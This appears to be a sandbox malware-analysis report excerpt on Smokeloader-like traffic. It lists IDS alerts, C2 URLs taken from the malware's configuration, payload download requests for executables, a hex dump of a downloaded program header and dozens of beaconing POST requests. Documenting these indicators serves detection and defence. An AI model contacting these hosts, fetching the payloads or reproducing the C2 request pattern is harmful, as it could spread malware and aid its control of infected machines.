        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49859 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49891 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49901 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49912 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49923 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49849 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49931 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49941 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49880 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49951 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50042 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50047 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50043 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50046 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50049 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50048 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50044 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50045 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50041 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50040 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50053 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50052 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50051 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50054 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50062 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50056 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50059 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50055 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50060 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50057 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50065 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50063 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50068 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50070 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50058 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50069 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50061 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50066 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50074 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50072 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50075 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50079 -> 58.151.148.90:80
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 45.118.248.184 443Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 192.185.146.136 443Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 51.79.230.147 443Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.181 443Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 101.99.94.162 80Jump to behavior
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: http://d-s-p.ru/tmp/index.php
        Source: Malware configuration extractorURLs: http://volisolsa.com.ua/tmp/index.php
        Source: Malware configuration extractorURLs: http://wga2s.cc/tmp/index.php
        Source: Malware configuration extractorURLs: http://worldofmorgan.com/tmp/index.php
        Uses dynamic DNS services
        Source: unknownDNS query: name: webdot.ddns.net
        Source: global trafficTCP traffic: 192.168.2.4:50073 -> 87.120.115.216:8080
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Dec 2024 18:45:47 GMTServer: ApacheLast-Modified: Sun, 29 Dec 2024 18:09:14 GMTETag: "11b517-62a6c97ed2680"Accept-Ranges: bytesContent-Length: 1160471Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 58 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 8e 07 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 10 00 00 04 00 00 c4 7c 12 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 40 0f 00 ce c8 00 00 00 00 00 00 00 00 00 00 f7 8c 11 00 20 28 00 00 00 a0 07 00 64 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 7e 06 00 00 b0 00 00 00 02 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 ce c8 00 00 00 40 0f 00 00 ca 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 32 0f 00 00 00 10 10 00 00 10 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: global trafficHTTP traffic detected: GET /plugins/panel/uploads/Mwczjtflz.mp4 HTTP/1.1Host: lotuseffectllc.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /plugins/panel/uploads/Mwczjtflz.mp4 HTTP/1.1Host: lotuseffectllc.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 58.151.148.90 58.151.148.90
        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
        Source: Joe Sandbox ViewASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR
        Source: Joe Sandbox ViewASN Name: ITACE-AS-APItaceInternationalLimitedHK ITACE-AS-APItaceInternationalLimitedHK
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49760 -> 23.145.40.181:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50050 -> 51.79.230.147:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49962 -> 23.145.40.181:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50064 -> 192.185.146.136:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50076 -> 45.118.248.184:443
        Source: global trafficHTTP traffic detected: GET /wp-content/images/pic4.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.tazc.com.my
        Source: global trafficHTTP traffic detected: GET /Vmujqcxm.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: upadaria.org
        Source: global trafficHTTP traffic detected: GET /Birge.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: firemane.org
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cjwipwxdaicmvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://syotscpmruqadjb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ixkqycfpabx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://npglxuptseuhsgp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bqeerlntfui.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uunijchpjmgfo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fsblnagupakjnja.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://urvsasyqvqgwxp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://duabtcnoqxwepta.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ilgayipokchjnwi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jifjhlrdcghs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yawtrsbxaqno.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://askrbnixhwd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bmvgxhhwuegchsnk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fumgmeseepesr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kjsrpmbmjduiwv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ksvvejaqmamsa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtfnihcjaxwmos.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amrgqqtkvbsuyfiq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://htevegfcswyxd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hxhrbhxaiegx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nysccihvdkds.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://grgynsvjunbdyj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rkeqfvulevu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://paiaccswdvwaulm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecpopbfcnylhn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wgfecinevmagrs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wgggkliaxflrlukv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://abtqqggxsfhktnpg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wluclgmelcx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cskorkkrkwytkhtu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fghaoijaskpcuqs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufwlknyimcdyhhff.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jessdujhjjx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hsmioefmqryctki.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mmcpyibdxwiwlos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bqqqwcluixvv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wojftrqpwndwmdu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rcluvmsnbxjmn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://abpyxpuyjhta.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anvunsnhjllayr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iupqlsqcljbulu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovyowegmnacdkibi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lsjajjgmqahp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovpfvtkrixi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ddedgrkngjekmoj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: d-s-p.ru
